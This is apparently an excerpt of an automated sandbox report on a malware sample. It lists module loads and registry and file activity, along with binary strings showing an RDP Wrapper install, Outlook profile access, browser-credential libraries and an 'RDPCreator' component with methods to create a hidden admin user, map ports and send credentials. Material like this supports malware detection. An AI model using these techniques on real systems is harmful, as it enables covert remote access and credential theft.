Source: C:\Windows\System32\netsh.exe	Section loaded: nshwfp.dll
Source: C:\Windows\System32\netsh.exe	Section loaded: cabinet.dll
Source: C:\Windows\System32\netsh.exe	Section loaded: p2pnetsh.dll
Source: C:\Windows\System32\netsh.exe	Section loaded: p2p.dll
Source: C:\Windows\System32\netsh.exe	Section loaded: profapi.dll
Source: C:\Windows\System32\netsh.exe	Section loaded: cryptbase.dll
Source: C:\Windows\System32\netsh.exe	Section loaded: rpcnsh.dll
Source: C:\Windows\System32\netsh.exe	Section loaded: wcnnetsh.dll
Source: C:\Windows\System32\netsh.exe	Section loaded: wlanapi.dll
Source: C:\Windows\System32\netsh.exe	Section loaded: whhelper.dll
Source: C:\Windows\System32\netsh.exe	Section loaded: winhttp.dll
Source: C:\Windows\System32\netsh.exe	Section loaded: wlancfg.dll
Source: C:\Windows\System32\netsh.exe	Section loaded: cryptsp.dll
Source: C:\Windows\System32\netsh.exe	Section loaded: wshelper.dll
Source: C:\Windows\System32\netsh.exe	Section loaded: wevtapi.dll
Source: C:\Windows\System32\netsh.exe	Section loaded: mswsock.dll
Source: C:\Windows\System32\netsh.exe	Section loaded: wwancfg.dll
Source: C:\Windows\System32\netsh.exe	Section loaded: wwapi.dll
Source: C:\Windows\System32\netsh.exe	Section loaded: wcmapi.dll
Source: C:\Windows\System32\netsh.exe	Section loaded: rmclient.dll
Source: C:\Windows\System32\netsh.exe	Section loaded: mobilenetworking.dll
Source: C:\Windows\System32\netsh.exe	Section loaded: peerdistsh.dll
Source: C:\Windows\System32\netsh.exe	Section loaded: uxtheme.dll
Source: C:\Windows\System32\netsh.exe	Section loaded: slc.dll
Source: C:\Windows\System32\netsh.exe	Section loaded: sppc.dll
Source: C:\Windows\System32\netsh.exe	Section loaded: gpapi.dll
Source: C:\Windows\System32\netsh.exe	Section loaded: ktmw32.dll
Source: C:\Windows\System32\netsh.exe	Section loaded: mprmsg.dll
Source: C:\Windows\System32\netsh.exe	Section loaded: windows.storage.dll
Source: C:\Windows\System32\netsh.exe	Section loaded: wldp.dll
Source: C:\Windows\System32\netsh.exe	Section loaded: msasn1.dll
Source: C:\Windows\SysWOW64\net.exe	Section loaded: mpr.dll
Source: C:\Windows\SysWOW64\net.exe	Section loaded: wkscli.dll
Source: C:\Windows\SysWOW64\net.exe	Section loaded: netutils.dll
Source: C:\Windows\SysWOW64\net.exe	Section loaded: samcli.dll
Source: C:\Windows\SysWOW64\net.exe	Section loaded: srvcli.dll
Source: C:\Windows\SysWOW64\net.exe	Section loaded: iphlpapi.dll
Source: C:\Windows\SysWOW64\net1.exe	Section loaded: samcli.dll
Source: C:\Windows\SysWOW64\net1.exe	Section loaded: netutils.dll
Source: C:\Windows\SysWOW64\net1.exe	Section loaded: dsrole.dll
Source: C:\Windows\SysWOW64\net1.exe	Section loaded: srvcli.dll
Source: C:\Windows\SysWOW64\net1.exe	Section loaded: wkscli.dll
Source: C:\Windows\SysWOW64\net1.exe	Section loaded: logoncli.dll
Source: C:\Windows\SysWOW64\net1.exe	Section loaded: cryptbase.dll
Source: C:\Windows\SysWOW64\net1.exe	Section loaded: samlib.dll
Source: C:\Windows\SysWOW64\net.exe	Section loaded: mpr.dll
Source: C:\Windows\SysWOW64\net.exe	Section loaded: wkscli.dll
Source: C:\Windows\SysWOW64\net.exe	Section loaded: netutils.dll
Source: C:\Windows\SysWOW64\net.exe	Section loaded: samcli.dll
Source: C:\Windows\SysWOW64\net.exe	Section loaded: srvcli.dll
Source: C:\Windows\SysWOW64\net.exe	Section loaded: iphlpapi.dll
Source: C:\Windows\SysWOW64\net1.exe	Section loaded: samcli.dll
Source: C:\Windows\SysWOW64\net1.exe	Section loaded: netutils.dll
Source: C:\Windows\SysWOW64\net1.exe	Section loaded: dsrole.dll
Source: C:\Windows\SysWOW64\net1.exe	Section loaded: srvcli.dll
Source: C:\Windows\SysWOW64\net1.exe	Section loaded: wkscli.dll
Source: C:\Windows\SysWOW64\net1.exe	Section loaded: logoncli.dll
Source: C:\Windows\SysWOW64\net1.exe	Section loaded: cryptbase.dll
Source: C:\Windows\SysWOW64\net1.exe	Section loaded: cscapi.dll
Source: C:\Windows\SysWOW64\net1.exe	Section loaded: samlib.dll
Source: C:\Windows\SysWOW64\netsh.exe	Section loaded: kernel.appcore.dll
Source: C:\Windows\SysWOW64\netsh.exe	Section loaded: ifmon.dll
Source: C:\Windows\SysWOW64\netsh.exe	Section loaded: iphlpapi.dll
Source: C:\Windows\SysWOW64\netsh.exe	Section loaded: mprapi.dll
Source: C:\Windows\SysWOW64\netsh.exe	Section loaded: rasmontr.dll
Source: C:\Windows\SysWOW64\netsh.exe	Section loaded: rasapi32.dll
Source: C:\Windows\SysWOW64\netsh.exe	Section loaded: fwpuclnt.dll
Source: C:\Windows\SysWOW64\netsh.exe	Section loaded: rasman.dll
Source: C:\Windows\SysWOW64\netsh.exe	Section loaded: mfc42u.dll
Source: C:\Windows\SysWOW64\netsh.exe	Section loaded: rasman.dll
Source: C:\Windows\SysWOW64\netsh.exe	Section loaded: authfwcfg.dll
Source: C:\Windows\SysWOW64\netsh.exe	Section loaded: fwpolicyiomgr.dll
Source: C:\Windows\SysWOW64\netsh.exe	Section loaded: firewallapi.dll
Source: C:\Windows\SysWOW64\netsh.exe	Section loaded: dnsapi.dll
Source: C:\Windows\SysWOW64\netsh.exe	Section loaded: fwbase.dll
Source: C:\Windows\SysWOW64\netsh.exe	Section loaded: dhcpcmonitor.dll
Source: C:\Windows\SysWOW64\netsh.exe	Section loaded: dot3cfg.dll
Source: C:\Windows\SysWOW64\netsh.exe	Section loaded: dot3api.dll
Source: C:\Windows\SysWOW64\netsh.exe	Section loaded: onex.dll
Source: C:\Windows\SysWOW64\netsh.exe	Section loaded: eappcfg.dll
Source: C:\Windows\SysWOW64\netsh.exe	Section loaded: ncrypt.dll
Source: C:\Windows\SysWOW64\netsh.exe	Section loaded: eappprxy.dll
Source: C:\Windows\SysWOW64\netsh.exe	Section loaded: ntasn1.dll
Source: C:\Windows\SysWOW64\netsh.exe	Section loaded: fwcfg.dll
Source: C:\Windows\SysWOW64\netsh.exe	Section loaded: hnetmon.dll
Source: C:\Windows\SysWOW64\netsh.exe	Section loaded: netshell.dll
Source: C:\Windows\SysWOW64\netsh.exe	Section loaded: nlaapi.dll
Source: C:\Windows\SysWOW64\netsh.exe	Section loaded: netsetupapi.dll
Source: C:\Windows\SysWOW64\netsh.exe	Section loaded: netiohlp.dll
Source: C:\Windows\SysWOW64\netsh.exe	Section loaded: dhcpcsvc.dll
Source: C:\Windows\SysWOW64\netsh.exe	Section loaded: winnsi.dll
Source: C:\Windows\SysWOW64\netsh.exe	Section loaded: nshhttp.dll
Source: C:\Windows\SysWOW64\netsh.exe	Section loaded: httpapi.dll
Source: C:\Windows\SysWOW64\netsh.exe	Section loaded: nshipsec.dll
Source: C:\Windows\SysWOW64\netsh.exe	Section loaded: userenv.dll
Source: C:\Windows\SysWOW64\netsh.exe	Section loaded: activeds.dll
Source: C:\Windows\SysWOW64\netsh.exe	Section loaded: polstore.dll
Source: C:\Windows\SysWOW64\netsh.exe	Section loaded: winipsec.dll
Source: C:\Windows\SysWOW64\netsh.exe	Section loaded: adsldpc.dll
Source: C:\Windows\SysWOW64\netsh.exe	Section loaded: nshwfp.dll
Source: C:\Windows\SysWOW64\netsh.exe	Section loaded: cabinet.dll
Source: C:\Windows\SysWOW64\netsh.exe	Section loaded: p2pnetsh.dll
Source: C:\Windows\SysWOW64\netsh.exe	Section loaded: p2p.dll
Source: C:\Windows\SysWOW64\netsh.exe	Section loaded: profapi.dll
Source: C:\Windows\SysWOW64\netsh.exe	Section loaded: cryptbase.dll
Source: C:\Windows\SysWOW64\netsh.exe	Section loaded: rpcnsh.dll
Source: C:\Windows\SysWOW64\netsh.exe	Section loaded: whhelper.dll
Source: C:\Windows\SysWOW64\netsh.exe	Section loaded: winhttp.dll
Source: C:\Windows\SysWOW64\netsh.exe	Section loaded: wlancfg.dll
Source: C:\Windows\SysWOW64\netsh.exe	Section loaded: cryptsp.dll
Source: C:\Windows\SysWOW64\netsh.exe	Section loaded: wlanapi.dll
Source: C:\Windows\SysWOW64\netsh.exe	Section loaded: wshelper.dll
Source: C:\Windows\SysWOW64\netsh.exe	Section loaded: wevtapi.dll
Source: C:\Windows\SysWOW64\netsh.exe	Section loaded: mswsock.dll
Source: C:\Windows\SysWOW64\netsh.exe	Section loaded: peerdistsh.dll
Source: C:\Windows\SysWOW64\netsh.exe	Section loaded: uxtheme.dll
Source: C:\Windows\SysWOW64\netsh.exe	Section loaded: wcmapi.dll
Source: C:\Windows\SysWOW64\netsh.exe	Section loaded: rmclient.dll
Source: C:\Windows\SysWOW64\netsh.exe	Section loaded: mobilenetworking.dll
Source: C:\Windows\SysWOW64\netsh.exe	Section loaded: slc.dll
Source: C:\Windows\SysWOW64\netsh.exe	Section loaded: sppc.dll
Source: C:\Windows\SysWOW64\netsh.exe	Section loaded: gpapi.dll
Source: C:\Windows\SysWOW64\netsh.exe	Section loaded: ktmw32.dll
Source: C:\Windows\SysWOW64\netsh.exe	Section loaded: mprmsg.dll
Source: C:\Windows\SysWOW64\netsh.exe	Section loaded: windows.storage.dll
Source: C:\Windows\SysWOW64\netsh.exe	Section loaded: wldp.dll
Source: C:\Windows\SysWOW64\netsh.exe	Section loaded: msasn1.dll
Source: C:\Windows\SysWOW64\net.exe	Section loaded: mpr.dll
Source: C:\Windows\SysWOW64\net.exe	Section loaded: wkscli.dll
Source: C:\Windows\SysWOW64\net.exe	Section loaded: netutils.dll
Source: C:\Windows\SysWOW64\net.exe	Section loaded: samcli.dll
Source: C:\Windows\SysWOW64\net.exe	Section loaded: srvcli.dll
Source: C:\Windows\SysWOW64\net.exe	Section loaded: iphlpapi.dll
Source: C:\Windows\SysWOW64\net1.exe	Section loaded: samcli.dll
Source: C:\Windows\SysWOW64\net1.exe	Section loaded: netutils.dll
Source: C:\Windows\SysWOW64\net1.exe	Section loaded: dsrole.dll
Source: C:\Windows\SysWOW64\net1.exe	Section loaded: srvcli.dll
Source: C:\Windows\SysWOW64\net1.exe	Section loaded: wkscli.dll
Source: C:\Windows\SysWOW64\net1.exe	Section loaded: logoncli.dll
Source: C:\Windows\SysWOW64\net1.exe	Section loaded: cryptbase.dll
Source: C:\Windows\SysWOW64\net1.exe	Section loaded: samlib.dll
Source: C:\Windows\SysWOW64\net.exe	Section loaded: mpr.dll
Source: C:\Windows\SysWOW64\net.exe	Section loaded: wkscli.dll
Source: C:\Windows\SysWOW64\net.exe	Section loaded: netutils.dll
Source: C:\Windows\SysWOW64\net.exe	Section loaded: samcli.dll
Source: C:\Windows\SysWOW64\net.exe	Section loaded: srvcli.dll
Source: C:\Windows\SysWOW64\net.exe	Section loaded: iphlpapi.dll
Source: C:\Windows\SysWOW64\net1.exe	Section loaded: samcli.dll
Source: C:\Windows\SysWOW64\net1.exe	Section loaded: netutils.dll
Source: C:\Windows\SysWOW64\net1.exe	Section loaded: dsrole.dll
Source: C:\Windows\SysWOW64\net1.exe	Section loaded: srvcli.dll
Source: C:\Windows\SysWOW64\net1.exe	Section loaded: wkscli.dll
Source: C:\Windows\SysWOW64\net1.exe	Section loaded: logoncli.dll
Source: C:\Windows\SysWOW64\net1.exe	Section loaded: cryptbase.dll
Source: C:\Windows\SysWOW64\net1.exe	Section loaded: samlib.dll
Source: C:\ProgramData\BKFHCGIDBA.exe	Section loaded: mscoree.dll
Source: C:\ProgramData\BKFHCGIDBA.exe	Section loaded: apphelp.dll
Source: C:\ProgramData\BKFHCGIDBA.exe	Section loaded: kernel.appcore.dll
Source: C:\ProgramData\BKFHCGIDBA.exe	Section loaded: version.dll
Source: C:\ProgramData\BKFHCGIDBA.exe	Section loaded: vcruntime140_clr0400.dll
Source: C:\ProgramData\BKFHCGIDBA.exe	Section loaded: ucrtbase_clr0400.dll
Source: C:\ProgramData\BKFHCGIDBA.exe	Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: apphelp.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: aclayers.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: mpr.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: sfc.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: sfc_os.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: winhttp.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: ondemandconnroutehelper.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: webio.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: mswsock.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: iphlpapi.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: winnsi.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: sspicli.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: dnsapi.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: rasadhlp.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: fwpuclnt.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: schannel.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: mskeyprotect.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: ntasn1.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: ncrypt.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: ncryptsslp.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: msasn1.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: cryptsp.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: rsaenh.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: cryptbase.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: gpapi.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: dpapi.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: ondemandconnroutehelper.dll
Source: C:\ProgramData\BKJJEBKKEH.exe	Section loaded: mscoree.dll
Source: C:\ProgramData\BKJJEBKKEH.exe	Section loaded: apphelp.dll
Source: C:\ProgramData\BKJJEBKKEH.exe	Section loaded: kernel.appcore.dll
Source: C:\ProgramData\BKJJEBKKEH.exe	Section loaded: version.dll
Source: C:\ProgramData\BKJJEBKKEH.exe	Section loaded: vcruntime140_clr0400.dll
Source: C:\ProgramData\BKJJEBKKEH.exe	Section loaded: ucrtbase_clr0400.dll
Source: C:\ProgramData\BKJJEBKKEH.exe	Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: apphelp.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: aclayers.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: mpr.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: sfc.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: sfc_os.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: sspicli.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: wininet.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: rstrtmgr.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: ncrypt.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: ntasn1.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: dbghelp.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: iertutil.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: windows.storage.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: wldp.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: profapi.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: kernel.appcore.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: ondemandconnroutehelper.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: winhttp.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: mswsock.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: iphlpapi.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: winnsi.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: urlmon.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: srvcli.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: netutils.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: dnsapi.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: rasadhlp.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: fwpuclnt.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: schannel.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: mskeyprotect.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: msasn1.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: dpapi.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: cryptsp.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: rsaenh.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: cryptbase.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: gpapi.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: ncryptsslp.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: wbemcomn.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: amsi.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: userenv.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: version.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: uxtheme.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: sxs.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: ntmarta.dll
Source: C:\ProgramData\GIEBGIIJDG.exe	Section loaded: mscoree.dll
Source: C:\ProgramData\GIEBGIIJDG.exe	Section loaded: apphelp.dll
Source: C:\ProgramData\GIEBGIIJDG.exe	Section loaded: kernel.appcore.dll
Source: C:\ProgramData\GIEBGIIJDG.exe	Section loaded: version.dll
Source: C:\ProgramData\GIEBGIIJDG.exe	Section loaded: vcruntime140_clr0400.dll
Source: C:\ProgramData\GIEBGIIJDG.exe	Section loaded: ucrtbase_clr0400.dll
Source: C:\ProgramData\GIEBGIIJDG.exe	Section loaded: ucrtbase_clr0400.dll
Source: C:\ProgramData\GIEBGIIJDG.exe	Section loaded: cryptsp.dll
Source: C:\ProgramData\GIEBGIIJDG.exe	Section loaded: rsaenh.dll
Source: C:\ProgramData\GIEBGIIJDG.exe	Section loaded: cryptbase.dll
Source: C:\ProgramData\GIEBGIIJDG.exe	Section loaded: wldp.dll
Source: C:\ProgramData\GIEBGIIJDG.exe	Section loaded: amsi.dll
Source: C:\ProgramData\GIEBGIIJDG.exe	Section loaded: userenv.dll
Source: C:\ProgramData\GIEBGIIJDG.exe	Section loaded: profapi.dll
Source: C:\ProgramData\GIEBGIIJDG.exe	Section loaded: msasn1.dll
Source: C:\ProgramData\GIEBGIIJDG.exe	Section loaded: gpapi.dll
Source: C:\Windows\SysWOW64\net.exe	Section loaded: mpr.dll
Source: C:\Windows\SysWOW64\net.exe	Section loaded: wkscli.dll
Source: C:\Windows\SysWOW64\net.exe	Section loaded: netutils.dll

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{057EEE47-2572-4AA1-88D7-60CE2149E33C}\InProcServer32

Jump to behavior

Source: C:\Users\user\AppData\Local\Temp\RDPWInst.exe

File written: C:\Program Files\RDP Wrapper\rdpwrap.ini

Source: Window Recorder

Window detected: More than 3 window changes detected

Source: C:\Users\userBGIJEGCGDG.exe

File opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dll

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

Key opened: HKEY_CURRENT_USER\Software\Microsoft\Office\13.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000001

Jump to behavior

Source: C:\Users\user\AppData\Local\Temp\RDPWInst.exe	Directory created: C:\Program Files\RDP Wrapper
Source: C:\Users\user\AppData\Local\Temp\RDPWInst.exe	Directory created: C:\Program Files\RDP Wrapper\rdpwrap.ini
Source: C:\Users\user\AppData\Local\Temp\RDPWInst.exe	Directory created: C:\Program Files\RDP Wrapper\rdpwrap.dll

Source: file.exe

Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR

Source: file.exe

Static PE information: HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE

Source: file.exe

Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG

Source:	Binary string: mozglue.pdbP source: RegAsm.exe, 00000004.00000002.2567199832.000000006C31D000.00000002.00000001.01000000.00000009.sdmp, RegAsm.exe, 0000000A.00000002.2995997954.00000000267F5000.00000004.00000020.00020000.00000000.sdmp, mozglue[1].dll.4.dr, mozglue.dll.4.dr
Source:	Binary string: freebl3.pdb source: RegAsm.exe, 0000000A.00000002.2991833076.0000000020883000.00000004.00000020.00020000.00000000.sdmp, freebl3.dll.4.dr
Source:	Binary string: freebl3.pdbp source: RegAsm.exe, 0000000A.00000002.2991833076.0000000020883000.00000004.00000020.00020000.00000000.sdmp, freebl3.dll.4.dr
Source:	Binary string: nss3.pdb@ source: RegAsm.exe, 00000004.00000002.2569131365.000000006C4DF000.00000002.00000001.01000000.00000008.sdmp, RegAsm.exe, 0000000A.00000002.3011454614.000000003E5B7000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: costura.costura.pdb.compressedlB]q source: userBGIJEGCGDG.exe, 00000012.00000002.2482597726.0000000002B01000.00000004.00000800.00020000.00000000.sdmp, GIEBGIIJDG.exe, 0000003E.00000002.2939917338.00000000023D1000.00000004.00000800.00020000.00000000.sdmp
Source:	Binary string: rdpclip.pdbH source: RDPWInst.exe, 0000001A.00000002.2307313365.0000000000450000.00000002.00000001.01000000.0000000F.sdmp
Source:	Binary string: costura.costura.pdb.compressed source: userBGIJEGCGDG.exe, 00000012.00000000.2213860525.0000000000832000.00000002.00000001.01000000.0000000C.sdmp, GIEBGIIJDG.exe, 0000003E.00000002.2939917338.00000000023D1000.00000004.00000800.00020000.00000000.sdmp
Source:	Binary string: rdpclip.pdbJ source: RDPWInst.exe, 0000001A.00000002.2307313365.0000000000450000.00000002.00000001.01000000.0000000F.sdmp
Source:	Binary string: softokn3.pdb@ source: RegAsm.exe, 0000000A.00000002.3004111207.00000000326DA000.00000004.00000020.00020000.00000000.sdmp, softokn3[1].dll.4.dr
Source:	Binary string: <>c__DisplayClass0_0<GenerateRandomPassword>b__0<>u__1IEnumerable`1Task`1TaskAwaiter`10xb11a1<>u__2Func`2Dictionary`2<Main>d__5get_UTF8<Module><Main>Q2xpZW50QUFBUkRQSW5zdGFsbGVyQUFBUHJvZ3JhbUFBQXNzZW1ibHlMb2FkZXJBUkRQQ3JlYXRvcl9Qcm9jZXNzZWRCeUZvZHlBSystem.IOGetPublicIP_Costuracostura.metadatamscorlibSystem.Collections.GenericDiscoverDeviceAsyncDownloadFileTaskAsyncCreatePortMapAsyncReadLoadAddisAttachedInterlockedcostura.costura.pdb.compressedcostura.costura.dll.compressedcostura.system.diagnostics.diagnosticsource.dll.compressedcostura.open.nat.dll.compressedget_ConnectedAwaitUnsafeOnCompletedget_IsCompletedSystem.Collections.SpecializedNewGuidReadToEndExecuteCommandcommandGenerateRandomPasswordpasswordNatDeviceCancellationTokenSourcesourceset_ModePaddingModeCompressionModeCipherModeRangeExchangenullCacheEnumerableIDisposableget_AsyncWaitHandleDownloadFileget_NamefullNameGetAdminGroupNameGetNamerequestedAssemblyNameusernameWaitOneCombineIAsyncStateMachineSetStateMachinestateMachineValueTypeSystem.CorecultureDisposeCreate<>1__stateWriteCompilerGeneratedAttributeDebuggableAttributeAsyncStateMachineAttributeTargetFrameworkAttributeDebuggerHiddenAttributeCompilationRelaxationsAttributeRuntimeCompatibilityAttributeset_UseShellExecuteByteTryGetValueadd_AssemblyResolveRDPCreator.exeSystem.Threadingset_PaddingEncodingSystem.Runtime.VersioningMappingFromBase64StringDownloadStringCultureToStringGetStringSubstringAttachComputeHashzipPathGetTempPathpathget_LengthlengthEndsWithUriAsyncCallbacknullCacheLockTransformFinalBlockget_TaskProtocolzipUrlserverUrlurlReadStreamLoadStreamGetManifestResourceStreamDeflateStreamMemoryStreamstreamset_ItemSystemSymmetricAlgorithmHashAlgorithmRandomrandomICryptoTransformTimeSpanIsPortOpenRDPCreator.cMainAppDomainget_CurrentDomainFodyVersionSystem.IO.CompressiondestinationSystem.GlobalizationSystem.ReflectionNameValueCollectionset_PositionSetExceptionStringComparisonusernamePatternpatternCopyToget_CultureInfoProcessStartInfoAddUserToAdminGroupSystem.LinqClearStreamReaderTextReaderMD5CryptoServiceProviderTripleDESCryptoServiceProviderAsyncTaskMethodBuilder<>t__buildersenderResolveEventHandlerPortMapperInstallRDPWrapperNatDiscovererCheckForRDPUserCreateAdminUserTaskAwaiterGetAwaiterEnterRDPCreator.ctor.cctorMonitorCreateDecryptorSystem.DiagnosticsFromMillisecondsSystem.Runtime.CompilerServicesReadFromEmbeddedResourcesDebuggingModesGetAssembliesresourceNamessymbolNamesassemblyNamesGetBytesUploadValuesget_FlagsAssemblyNameFlagsResolveEventArgsargsSystem.Threading.TasksSendCredentialsEqualsContainsget_CharsProcessSystem.Net.SocketsExistsOpen.NatConcatObjectSelectBeginConnectSystem.NetWaitForExitIAsyncResultGetResultSetResultToLowerInvariantWebClientTcpClientEnvironmentStartConvertRDPPortportget_StandardOutputset_RedirectStandardOutputExecuteCommandWithOutputMoveNextSystem.Textset_CreateNoWindowToArrayset_KeyContainsKeySystem.Security.CryptographyResolveAssemblyReadExistingAssemblyGetExecutingAssemblyIsNullOrEmptyWj66qRZAtguDUcGmA5
Source:	Binary string: RfxVmt.pdb source: RDPWInst.exe, 0000001A.00000002.2307313365.0000000000450000.00000002.00000001.01000000.0000000F.sdmp
Source:	Binary string: d:\agent\_work\1\s\binaries\x86ret\bin\i386\\vcruntime140.i386.pdb source: RegAsm.exe, 0000000A.00000002.3007941787.0000000038646000.00000004.00000020.00020000.00000000.sdmp, vcruntime140.dll.4.dr
Source:	Binary string: d:\agent\_work\1\s\binaries\x86ret\bin\i386\\msvcp140.i386.pdb source: RegAsm.exe, 0000000A.00000002.2999719026.000000002C769000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: costura.costura.pdb.compressed@\]q source: GIEBGIIJDG.exe, 0000003E.00000002.2939917338.00000000023D1000.00000004.00000800.00020000.00000000.sdmp
Source:	Binary string: nss3.pdb source: RegAsm.exe, 00000004.00000002.2569131365.000000006C4DF000.00000002.00000001.01000000.00000008.sdmp, RegAsm.exe, 0000000A.00000002.3011454614.000000003E5B7000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: rdpclip.pdb source: RDPWInst.exe, 0000001A.00000002.2307313365.0000000000450000.00000002.00000001.01000000.0000000F.sdmp
